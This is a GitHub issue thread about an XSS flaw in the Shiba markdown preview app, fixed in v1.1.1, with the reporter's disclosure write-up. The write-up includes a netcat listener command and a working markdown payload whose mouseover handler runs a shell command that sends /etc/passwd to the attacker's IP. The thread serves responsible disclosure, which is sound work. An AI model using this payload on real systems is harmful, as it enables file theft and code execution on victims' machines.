rhysd
commented
6 years ago This was fixed in v1.1.1. So I'm closing. Thank you for your report.
Closed silviavali closed 6 years ago
rhysd
commented
6 years ago This was fixed in v1.1.1. So I'm closing. Thank you for your report.
silviavali
commented
6 years ago Thanks for the info on the fix and the version.
Silvia
On 30 November 2017 at 05:07, Linda_pp notifications@github.com wrote:
Closed #42 https://github.com/rhysd/Shiba/issues/42.
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/rhysd/Shiba/issues/42#event-1364852233, or mute the thread https://github.com/notifications/unsubscribe-auth/ASTfilaqsFqKtYzKxmReITCUhvCqNTNxks5s7hwLgaJpZM4Qqhgz .
attritionorg
commented
6 years ago @rhysd Can you confirm https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab is the fixing commit?
silviavali
commented
6 years ago Hey,
Fix confirmed. Awesome job :) https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab
On 6 December 2017 at 06:18, Jericho notifications@github.com wrote:
@rhysd https://github.com/rhysd Can you confirm e8a65b0 https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab is the fixing commit?
— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/rhysd/Shiba/issues/42#issuecomment-349528260, or mute the thread https://github.com/notifications/unsubscribe-auth/ASTfihwxJE7qkmC2Uc8HFvNxKOsmo0Xcks5s9hWRgaJpZM4Qqhgz .
rhysd
commented
6 years ago @attritionorg Yes.
silviavali
commented
6 years ago Date reported: 25th Nov, 2017 Vulnerable version: v1.1.0 Fixed on: Nov 28, 2017, version v1.1.1 (note: some of the HTML elements have been allowed since version v1.2.0) Fixing commit: https://github.com/rhysd/Shiba/commit/e8a65b0f81eb04903eedd29500d7e1bedf249eab
Shiba is rich live markdown preview app with linter. It provides functionality to open .md files, which means those files can be written by the user him/herself or markdown files shared to the user by some other third party.
Reproduce the vulnerability:
Attacker runs the following command in terminal and remains waiting for the connection 'home':
nc -l -p 1337 > passwd.txt
Attacker crafts the following file: payload.md, delivers it to the victim and victim opens it in Shiba:
<s <onmouseover="alert(1)"> <s onmouseover="const exec = require('child_process').exec; exec('nc -w 3 192.168.8.100 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) { console.error(e); throw e; } console.log('stdout ', stdout); console.log('stderr ', stderr); });alert('1')">Hallo</s>
Possible scenario: Attacker crafts a markdown file ’payload.md’ and makes it publicly available for download or tricks the victim to download it some other way and open it with the Shiba application. Attacker starts netcat and listens on port 1337 to receive /etc/passwd file content form the victim’s machine. Victim has downloaded and opened the file in Shiba application. If victim now hovers over the file content on the markdown editor, the payload gets executed on the background and the attacker receives the ‘/etc/passwd’ file content from the victim’s machine.
You can be sure that payload got triggered when alert 1 appears on victim’s screen.
Output from developer tools:
By now attacker has received the contents of the /etc/passwd file as the result:
rhysd
commented
6 years ago Thank you for your report. I'll investigate this issue this weekend.
rhysd
commented
6 years ago Ah, I'm sorry that I misunderstood your comment. https://github.com/rhysd/Shiba/issues/42#issuecomment-389316875 is a disclosure of this problem and already fixed.
Hello,
I would like to report a XSS vulnerability in your application that leads to code execution. I have a working POC that I dont want to post publicly. Please contact me at silviavali14@gmail.com